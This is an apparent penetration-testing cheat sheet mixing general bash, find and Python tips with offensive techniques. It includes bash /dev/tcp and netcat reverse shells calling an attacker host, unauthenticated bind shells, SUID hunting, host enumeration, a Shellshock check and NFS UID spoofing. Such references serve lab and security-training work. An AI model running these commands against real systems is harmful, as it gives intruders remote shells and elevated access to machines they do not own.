Table of Contents
shell / bash reference
tee
– copy stdin to stdout and into the named file; `-a` appends instead of truncating (e.g. `cmd | tee -a log.txt`)
File search
find / -iname 'sdb*' -exec ls -l {} \;
– find files by (case-insensitive) name and run a command on each match; quote the pattern so the shell does not expand it first, and put the command before `{}` (a bare `-exec {} \;` tries to execute every matched file itself)
cut -d'/' -f3
– split each line on the delimiter "/" and print the 3rd field (use straight quotes; curly quotes are passed to cut literally)
find / -perm -4000 -type f -print 2>/dev/null
– Find all SUID files (`-type f` skips directories, `2>/dev/null` hides permission-denied noise)
find / -perm -4000 -type f -exec ls -l {} \; 2>/dev/null
find / -perm -2000 -type f -print 2>/dev/null
– Find all SGID files (`-perm -6000` requires both SUID and SGID; GNU find's `-perm /6000` matches either)
find / -perm -2 ! -type l -ls 2>/dev/null
– find world-writable files (symlinks excluded); add `-not -path "/proc/*"` to skip pseudo-filesystem noise
Scripting
$1
first argument of script
for script
while IFS= read -r name; do
some commands with "$name" variable
done < filenames.txt
– (`for name in $(cat file)` also works but splits on every space and tab, not only on newlines; see IFS below)
IFS
– Internal Field Separator: the characters the shell splits words on (default: space, tab, newline)
IFS=$'\n'
– split on newlines only, so `for x in $(cat file)` loops once per line; `export` is not needed (word-splitting happens in the current shell) — save and restore it (`OLDIFS=$IFS` … `IFS=$OLDIFS`) when done
Ping Sweep – for i in $(seq 1 254); do ping -c 1 -W 1 10.11.1.$i | grep 'bytes from'; done   (`-W 1` caps the wait per host to one second; the grep keeps only hosts that replied)
Port Scan – while read -r p; do nc -nv -w1 -z 10.11.1.8 "$p"; done < portlist.txt   (`-z` connects without sending data, `-w1` is a one-second timeout; results go to stderr, so append `2>&1 | grep -iE 'open|succeeded'` to filter — the wording varies between netcat builds)
if
if [[ -z "$1" ]]; then  # true when $1 is empty or unset; use -n to test that a value was given (spaces inside the brackets are required)
some commands
fi
redirect StdErr to StdOut
2>&1   (place it after the stdout redirect: `cmd > out.txt 2>&1`; the reverse order sends stderr to the terminal)
command 2> /dev/null
– Ignore stderr
Reverse Shells
reverse shell (bash – linux)
bash -i >& /dev/tcp/192.168.30.5/443 0>&1
– interactive bash with stdin/stdout/stderr bound to a TCP connection back to 192.168.30.5:443; `/dev/tcp` is a bash-internal path, so this needs `bash`, not `sh`/dash. Start the listener first: `nc -nlvp 443`
bash -c 'echo > /dev/tcp/x.x.x.x/PORT && echo open || echo closed'
– check whether a TCP port is open by attempting a connect through /dev/tcp (the original `echo 1> …` is the same thing: `1>` is the stdout redirect, not an argument; only a newline is sent)
Netcat
- client mode –
nc -nv 127.0.0.1 25
- Server mode –
nc -nlvp 4444
- Server runs a command for whoever connects to the port (bind shell) –
nc -lvp 4444 -e cmd.exe
– `-e` is only present in netcat builds that include it (nc.exe, nc.traditional, ncat); OpenBSD netcat has no `-e`. The shell is unauthenticated — anyone who can reach the port gets it.
- port scan –
nc -nvv -w 1 -z "$ipaddress" "$startport"-"$endport"
– `-w` takes a timeout in seconds and `-z` scans without sending data; `-l` (listen mode) does not belong in a scan
- UDP –
-u
argument
reverse shell
- setup netcat listener on the attacking host –
nc -nlvp 4444
- on the target, connect back and hand over a shell (needs a netcat with `-e`) –
nc -nv ATTACKER_IP 4444 -e /bin/sh
ncat
- Nmap's netcat reimplementation; adds TLS (`--ssl`) and source-address filtering (`--allow`)
- bind shell –
ncat -lvp 4444 -e cmd.exe --allow 192.168.4.4 --ssl
– options are `--allow` and `--ssl` (double hyphen; the original had em-dashes pasted in). `--allow` only filters by source IP and is not authentication; `--ssl` without `--ssl-cert`/`--ssl-verify` encrypts the channel but authenticates neither end.
- client –
ncat -v 192.168.3.2 4444 --ssl
Fixing the Shell
- spawn a pty with python (see the script below)
- set TERM=xterm-color so full-screen programs (vi, less) draw correctly
- background the reverse shell with Ctrl-Z, then on the local terminal run `stty raw -echo; fg` — raw mode passes Ctrl-C and tab completion through to the remote shell; run `reset` locally when the session ends
fix shell script – linux
python -c 'import pty;pty.spawn("/bin/bash")'   # use python3 where python (2) is absent
export TERM=xterm-color
stty rows 50 cols 132   # match these to your own terminal (`stty size` locally)
tcpdump
-A
– Print each packet (minus its link level header) in ASCII. Handy for capturing web pages.
Python Reference
Python TTY – python -c 'import pty;pty.spawn("/bin/bash")'
Python Web server – python -m SimpleHTTPServer 8000 (Python 2) or python3 -m http.server 8000 (Python 3); serves the current directory to anyone who can reach the port, so run it from a dedicated directory and stop it when done
HEX conversion
import struct
hex(struct.unpack("I", b"VALU")[0]) # native byte order; "I" needs exactly 4 bytes (a bytes object, not str, on Python 3)
hex(struct.unpack(">I", b"VALU")[0]) # big endian
hex(struct.unpack("<I", b"VALU")[0]) # little endian
struct.pack("I", 0x2323323) # convert an integer to its 4-byte native-order representation (bytes); use "<I" / ">I" to fix the endianness explicitly
python ftp server
# Install pyftpdlib
pip install pyftpdlib
# Run (-w allows anonymous write access; the server binds all interfaces by default, so anyone on the network can upload — add -i <IP> to bind one interface and stop it when done. Port 21 needs root; use -p 2121 unprivileged.)
python -m pyftpdlib -p 21 -w
Enumeration
Basic Linux Privilege Escalation
Penetration Testing Methodology – 0DAYsecurity.com
-
What’s the OS? What version? What architecture?
cat /etc/*-release
uname -i
lsb_release -a
(Debian based OSs) -
Who are we? Where are we?
id
pwd
-
Who uses the box? What users? (And which ones have a valid shell)
cat /etc/passwd
grep -vE "nologin|false" /etc/passwd
-
What’s currently running on the box? What active network services are there?
ps aux
netstat -antup   (or `ss -antup` on systems without net-tools)
-
What’s installed? What kernel is being used?
dpkg -l
(Debian based OSs)
rpm -qa
(RPM based: CentOS / RHEL / openSUSE)
uname -a
Exploits
Shell Shock
env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id
– prints "vulnerable" if this bash still executes code trailing a function definition imported from the environment; a patched bash prints only the output of `id`
mysql
NFS
showmount -e IP
– list exports and which client addresses are allowed to mount them
showmount -a IP
– list clients that currently have the exports mounted (client:directory pairs)
mount -t nfs -o vers=3 IP:SHARE DIR
– mount NFS share (`-t` selects the filesystem type; `-f` means "fake" and would not mount anything)
- with AUTH_SYS (the default for NFSv3) the server trusts the UID/GID the client presents, so creating a local user with the same UID as a file's owner gives you that file's access on the mount
- export settings (see /etc/exports on the server)
- "root_squash" (default) – map the client's root (UID 0) to nobody; "no_root_squash" leaves root unmapped, so root on a client is root on the share (e.g. can place SUID binaries on it)
- "no_all_squash" (default) – non-root UIDs pass through unchanged; "all_squash" maps every client UID/GID to nobody